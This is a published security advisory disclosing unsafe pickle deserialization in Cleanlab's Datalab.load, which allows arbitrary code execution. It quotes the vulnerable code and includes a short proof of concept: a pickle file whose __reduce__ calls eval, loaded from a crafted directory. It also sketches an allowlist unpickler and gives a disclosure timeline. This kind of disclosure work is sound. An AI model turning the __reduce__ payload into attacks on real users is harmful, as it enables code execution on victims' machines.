SAI Security Advisory

Unsafe deserialization in Datalab leads to arbitrary code execution

September 12, 2024

Products Impacted

This vulnerability exists in Cleanlab versions v2.4.0 and newer.

CVSS Score: 7.8

AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
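
This vector corresponds to a local attack vector, low attack complexity, no privileges required, user interaction required, unchanged scope, and high confidentiality, integrity, and availability impact.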

CWE Categorization

CWE-502: Deserialization of Untrusted Data

Details

To exploit this vulnerability, an attacker creates a directory, places a malicious file named datalab.pkl in it, and sends the directory to a victim. When the victim loads the directory with Datalab.load, the vulnerable code is invoked. The vulnerability exists in the deserialize function of the _Serializer class in the cleanlab/datalab/internal/serialize.py file (shown below).

    @classmethod
    def deserialize(cls, path: str, data: Optional[Dataset] = None) -> Datalab:
        """Deserializes the datalab object from disk."""

        if not os.path.exists(path):
            raise ValueError(f"No folder found at specified path: {path}")

        with open(os.path.join(path, OBJECT_FILENAME), "rb") as f:
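            # pickle.load executes any __reduce__ payload embedded in the
            # file at this point, before _validate_version below is reached.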
            datalab: Datalab = pickle.load(f)

        cls._validate_version(datalab)

        # Load the issues from disk.
        issues_path = os.path.join(path, ISSUES_FILENAME)
        if not hasattr(datalab.data_issues, "issues") and os.path.exists(issues_path):
            datalab.data_issues.issues = pd.read_csv(issues_path)

        issue_summary_path = os.path.join(path, ISSUE_SUMMARY_FILENAME)
        if not hasattr(datalab.data_issues, "issue_summary") and os.path.exists(issue_summary_path):
            datalab.data_issues.issue_summary = pd.read_csv(issue_summary_path)

        if data is not None:
            if hash(data) != hash(datalab._data):
                raise ValueError(
                    "Data has been modified since Lab was saved. "
                    "Cannot load Lab with modified data."
                )

            if len(data) != len(datalab.labels):
                raise ValueError(
                    f"Length of data ({len(data)}) does not match length of labels ({len(datalab.labels)})"
                )

            datalab._data = Data(data, datalab.task, datalab.label_name)
            datalab.data = datalab._data._data

        return datalab

The above code is called by the Datalab.load function shown below.

    @staticmethod
    def load(path: str, data: Optional[Dataset] = None) -> "Datalab":
        """Loads Datalab object from a previously saved folder.

        Parameters
        ----------
        `path` :
            Path to the folder previously specified in ``Datalab.save()``.

        `data` :
            The dataset used to originally construct the Datalab.
            Remember the dataset is not saved as part of the Datalab,
            you must save/load the data separately.

        Returns
        -------
        `datalab` :
            A Datalab object that is identical to the one originally saved.
        """
        datalab = _Serializer.deserialize(path=path, data=data)
        load_message = f"Datalab loaded from folder: {path}"
        print(load_message)
        return datalab

When the user loads the directory containing the maliciously crafted pickle file, Datalab.load calls the deserialize classmethod of _Serializer, which locates the datalab.pkl file and passes it to pickle.load. Because pickle executes the embedded payload during deserialization, the attacker's code runs before any of the subsequent validation. An example attack can be seen below, where we first create the exploit directory containing the malicious pickle file.

import os
import pickle

class Exploit:
    def __reduce__(self):
        # pickle invokes this callable with these arguments at load time
        return (eval, ("print('pwned')",))

os.makedirs("./exploit", exist_ok=True)
with open("./exploit/datalab.pkl", "wb") as f:
    f.write(pickle.dumps(Exploit()))

Once the file has been created, the vulnerability can be exploited by having the user load the malicious directory:

from cleanlab import Datalab

Datalab.load("./exploit")

Once the user runs this, the attacker's arbitrary code is executed on their system.
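
Until loading is hardened upstream, users should only load Datalab folders from trusted sources. More generally, Python's pickle module allows restricting which globals may be resolved during unpickling by overriding Unpickler.find_class. The sketch below is an illustrative hardening pattern, not a vendor-supplied fix, and the allowlist entry is an assumption for demonstration:

import pickle

# Illustrative allowlist of (module, name) pairs that a trusted Datalab
# pickle is expected to reference. A real allowlist would need to cover
# every type a legitimate Datalab pickle actually uses.
ALLOWED_GLOBALS = {
    ("cleanlab.datalab.datalab", "Datalab"),
}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Refuse to resolve any global outside the allowlist, which blocks
        # gadget payloads such as (eval, ...) or (os.system, ...).
        if (module, name) not in ALLOWED_GLOBALS:
            raise pickle.UnpicklingError(f"blocked global: {module}.{name}")
        return super().find_class(module, name)

def restricted_load(path: str):
    with open(path, "rb") as f:
        return RestrictedUnpickler(f).load()

Allowlisting is defense in depth at best; the robust fix is to avoid unpickling untrusted input entirely.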

Timeline

July 11, 2024 — Vendor disclosure via the process outlined in the vendor's security page

September 6, 2024 — Followed up with the vendor to inform them of our plan to publish on September 12, 2024

September 12, 2024 — Public disclosure

Project URL

https://cleanlab.ai/

https://github.com/cleanlab/cleanlab

Researcher: Kasimir Schulz, Principal Security Researcher, HiddenLayer
